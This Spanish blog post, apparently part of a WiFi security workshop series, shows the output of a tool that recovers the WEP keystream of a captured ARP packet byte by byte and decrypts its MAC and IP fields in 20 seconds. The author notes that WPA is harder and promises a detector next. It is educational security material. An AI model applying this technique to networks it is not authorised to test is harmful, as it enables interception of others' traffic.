Paquete CIFRADO ORIGINAL (solo los datos + ICV)
***********************************************
4B 33 B8 7C 1F E4 E0 7B 54 0F EF 35 F8 58 65 A7
1F CF 1C 37 1A 25 47 4E C5 EB 1B A0 FB 1E 9B 2F
93 26 FF AC 7A FB 21 0F
-> Byte num. 1 Candidato n/a keystream E1 byte cifrado: 4B byte decode AA <--- DATOS conocidos --> CABECERA SNAP
-> Byte num. 2 Candidato n/a keystream 99 byte cifrado: 33 byte decode AA <--- DATOS conocidos --> CABECERA SNAP
-> Byte num. 3 Candidato n/a keystream BB byte cifrado: B8 byte decode 03 <--- DATOS conocidos --> CABECERA SNAP
-> Byte num. 4 Candidato n/a keystream 7C byte cifrado: 7C byte decode 00 <--- DATOS conocidos --> CABECERA SNAP
-> Byte num. 5 Candidato n/a keystream 1F byte cifrado: 1F byte decode 00 <--- DATOS conocidos --> CABECERA SNAP
-> Byte num. 6 Candidato n/a keystream E4 byte cifrado: E4 byte decode 00 <--- DATOS conocidos --> CABECERA SNAP
-> Byte num. 7 Candidato n/a keystream E8 byte cifrado: E0 byte decode 08 <--- DATOS conocidos --> Protocolo ARP
-> Byte num. 8 Candidato n/a keystream 7D byte cifrado: 7B byte decode 06 <--- DATOS conocidos --> Protocolo ARP
-> Byte num. 9 Candidato n/a keystream 54 byte cifrado: 54 byte decode 00 <--- DATOS conocidos --> Hardware Ethernet
-> Byte num. 10 Candidato n/a keystream 0E byte cifrado: 0F byte decode 01 <--- DATOS conocidos --> Hardware Ethernet
-> Byte num. 11 Candidato n/a keystream E7 byte cifrado: EF byte decode 08 <--- DATOS conocidos --> Protocolo IP
-> Byte num. 12 Candidato n/a keystream 35 byte cifrado: 35 byte decode 00 <--- DATOS conocidos --> Protocolo IP
-> Byte num. 13 Candidato n/a keystream FE byte cifrado: F8 byte decode 06 <--- DATOS conocidos --> Longitud MAC
-> Byte num. 14 Candidato n/a keystream 5C byte cifrado: 58 byte decode 04 <--- DATOS conocidos --> Versión IP
-> Byte num. 15 Candidato n/a keystream 65 byte cifrado: 65 byte decode 00 <--- DATOS conocidos --> ARP (REQ ó RESP)
-> Byte num. 16 Candidato BF keystream A6 byte cifrado: A7 byte decode 01 <--- ARP REQUEST
-> Byte num. 17 Candidato 3E keystream 1F byte cifrado: 1F byte decode 00 <--- MAC ORIGEN
-> Byte num. 18 Candidato 27 keystream D8 byte cifrado: CF byte decode 17 <--- MAC ORIGEN
-> Byte num. 19 Candidato 67 keystream 86 byte cifrado: 1C byte decode 9A <--- MAC ORIGEN
-> Byte num. 20 Candidato 66 keystream F4 byte cifrado: 37 byte decode C3 <--- MAC ORIGEN
-> Byte num. 21 Candidato C4 keystream CC byte cifrado: 1A byte decode D6 <--- MAC ORIGEN
-> Byte num. 22 Candidato 6E keystream 9C byte cifrado: 25 byte decode B9 <--- MAC ORIGEN
-> Byte num. 23 Candidato 67 keystream 4D byte cifrado: 47 byte decode 0A <--- IP ORIGEN (decimal 10)
-> Byte num. 24 Candidato F3 keystream 44 byte cifrado: 4E byte decode 0A <--- IP ORIGEN (decimal 10)
-> Byte num. 25 Candidato 3D keystream CF byte cifrado: C5 byte decode 0A <--- IP ORIGEN (decimal 10)
-> Byte num. 26 Candidato B2 keystream 23 byte cifrado: EB byte decode C8 <--- IP ORIGEN (decimal 200)
-> Byte num. 27 Candidato 5E keystream 1B byte cifrado: 1B byte decode 00 <--- MAC DESTINO
-> Byte num. 28 Candidato C5 keystream A0 byte cifrado: A0 byte decode 00 <--- MAC DESTINO
-> Byte num. 29 Candidato DC keystream FB byte cifrado: FB byte decode 00 <--- MAC DESTINO
-> Byte num. 30 Candidato DD keystream 1E byte cifrado: 1E byte decode 00 <--- MAC DESTINO
-> Byte num. 31 Candidato CB keystream 9B byte cifrado: 9B byte decode 00 <--- MAC DESTINO
-> Byte num. 32 Candidato DB keystream 2F byte cifrado: 2F byte decode 00 <--- MAC DESTINO
-> Byte num. 33 Candidato 17 keystream 99 byte cifrado: 93 byte decode 0A <--- IP DESTINO (decimal 10)
-> Byte num. 34 Candidato BD keystream 2C byte cifrado: 26 byte decode 0A <--- IP DESTINO (decimal 10)
-> Byte num. 35 Candidato CB keystream F5 byte cifrado: FF byte decode 0A <--- IP DESTINO (decimal 10)
-> Byte num. 36 Candidato 9D keystream 65 byte cifrado: AC byte decode C9 <--- IP DESTINO (decimal 201)
-> Byte num. 37 Candidato B0 keystream 37 byte cifrado: 7A byte decode 4D <--- ICV CRC32
-> Byte num. 38 Candidato 02 keystream 93 byte cifrado: FB byte decode 68 <--- ICV CRC32
-> Byte num. 39 Candidato 4C keystream E7 byte cifrado: 21 byte decode C6 <--- ICV CRC32
-> Byte num. 40 Candidato 4E keystream 66 byte cifrado: 0F byte decode 69 <--- ICV CRC32
Tipo ARP: REQUEST
MAC ORIGEN: 00 17 9A C3 D6 B9
IP ORIGEN: 10.10.10.200.
MAC DESTINO: 00 00 00 00 00 00
IP DESTINO: 10.10.10.201.
Parámetros WEP
**************
IV completo: F3 6F 00 00
Num de KEY usada: 00
keystream;
F3 6F 00 00 E1 99 BB 7C 1F E4 E8 7D 54 0E E7 35
FE 5C 65 A6 1F D8 86 F4 CC 9C 4D 44 CF 23 1B A0
FB 1E 9B 2F 99 2C F5 65 37 93 E7 66
Duración del ataque: 20 segundos
Taller_WiFi src #
Taller_WiFi src #
Como ves, 20 segundos!!!! que frente a los 13 minutos del anterior... pues como mejor programado
En el código fuente del mismo tienes todos los comentarios necesarios para comprender cómo funciona y por qué es tan rápido.
Que lo disfrutes.
No vamos a menospreciar al “lento”, nos vendrá muy bien cuando nos toque WPA y queramos hacer algo similar, con WPA la cosa cambia porque los IV’s no se pueden/deben reutilizar, se controla la integridad del mensaje y el punto de acceso puede tomar “contramedidas” y obligar a todos los clientes a renegociar las llaves por lo que el ataque no puede continuar, todo llegará.
Ahora, un detector, para el siguiente post.
By Vic_Thor
Suscribirse a:
Entradas (Atom)